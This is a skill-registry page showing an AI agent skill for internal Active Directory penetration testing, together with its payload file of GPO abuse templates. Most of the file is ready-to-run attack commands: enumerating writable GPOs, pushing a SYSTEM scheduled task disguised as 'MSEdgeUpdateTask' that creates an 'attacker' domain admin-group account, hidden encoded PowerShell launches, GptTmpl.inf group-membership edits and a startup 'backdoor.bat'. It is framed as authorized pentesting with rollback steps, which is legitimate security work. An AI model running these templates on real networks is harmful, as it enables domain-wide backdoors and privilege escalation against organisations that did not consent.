All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

payloadsgpo_abuse_templates.md

≈808 tokens on demand. Your agent reads this file only when SKILL.md points to it.

GPO Abuse Templates

When you have Write permissions on a GPO linked to a target OU (computer or user), you can push arbitrary actions to every member of that OU.

Preconditions

  • Domain user with GenericWrite / GenericAll / WriteDacl on a GPO object OR
  • Permissions on an organizational unit that allow adding a new GPO
  • Knowledge of the GPO's GUID and the target OU

Identify usable GPOs

# PowerView
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
  Where-Object { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" } |
  Where-Object { $_.SecurityIdentifier -eq $MyUserSID }
# NetExec
nxc ldap dc -u "$USER" -p "$PASS" --gpo-rights

# BloodHound
# See references/bloodhound_queries.md "GPO abuse" section

Template 1: SharpGPOAbuse — immediate scheduled task (SYSTEM)

Adds a one-time "Immediate Task" that executes on every computer in the linked OU at next policy refresh (~90 min default, force with gpupdate /force).

SharpGPOAbuse.exe --AddComputerTask `
  --TaskName "MSEdgeUpdateTask" `
  --Author "NT AUTHORITY\SYSTEM" `
  --Command "cmd.exe" `
  --Arguments "/c net user attacker P@ssw0rd1! /add /domain && net localgroup Administrators attacker /add" `
  --GPOName "WorkstationHardeningPolicy"

Template 2: pyGPOAbuse (Linux-side)

python3 pyGPOAbuse.py corp.local/user:pass -gpo-id "{31B2F340-016D-11D2-945F-00C04FB984F9}" \
  -f cmd -c "powershell -nop -w hidden -enc <b64>"

Template 3: Add user to local administrators (user-side GPO)

For a user-linked GPO, edit GptTmpl.inf to add a domain user to Administrators on every host the user logs into:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Members = *S-1-5-21-<domain>-<rid of attacker>,*S-1-5-32-544__Memberof =

Drop as \\corp.local\SYSVOL\corp.local\Policies\{GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf, then increment gPCMachineExtensionNames and GPO version counter.

Template 4: Startup script injection

Location: \\corp.local\SYSVOL\corp.local\Policies\{GUID}\Machine\Scripts\Startup\ + matching scripts.ini:

[Startup]
0CmdLine=backdoor.bat
0Parameters=

Contents of backdoor.bat:

@echo off
net user attacker P@ssw0rd1! /add
net localgroup Administrators attacker /add

Template 5: MSI install via software installation policy

For large-scope push of an MSI on reboot — heavy artefact, use sparingly.

Rollback (mandatory)

Every GPO edit must be reverted before engagement end:

SharpGPOAbuse.exe --RemoveComputerTask --TaskName "MSEdgeUpdateTask" \
  --GPOName "WorkstationHardeningPolicy"

Then confirm via gpresult /h post_rollback.html on at least one affected host.

Safety

  • Changes propagate to EVERY member of the linked OU. Confirm OU membership before pushing.
  • gpupdate /force is fast; the scheduled-task variant fires within seconds of refresh. Plan takedown BEFORE pushing.
  • Some customer GPO changes require change-management approval even from internal admins — ask first.
  • Prefer user-scope over computer-scope where feasible — smaller blast radius.

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest